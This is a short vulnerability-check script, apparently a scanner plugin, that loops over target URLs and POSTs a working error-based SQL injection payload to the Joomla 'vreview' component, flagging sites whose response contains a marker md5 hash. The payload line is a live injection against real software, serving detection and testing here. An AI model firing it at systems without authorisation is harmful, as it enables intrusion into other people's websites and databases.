#request urls = array
#define payload = /index.php?option=com_vreview&task=displayReply
#define bug = ef775988943825d2871e1cfa75473ec
#define info = joomla-component-vreview-sql
#define post = profileid=-8511 OR 1 GROUP BY CONCAT(0x7e,md5(99999999),0x7e,FLOOR(RAND(0)*2)) HAVING MIN(0)#

function main(args)
{
	printclolor("当前正在检测:".info,1);
	i = 0;
	num = GetArrayNum(urls);
	while(i<num){
		url = urls[i];
		try{
			res = HttpPost(url.payload,post,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
			if(StrFindStr(res[0],bug,0)!= "-1")
			{
				printclolor("[+]".urls[i].info,3);
			}
		}catch{
		}
		i = ToInt(i+1);
	}
}
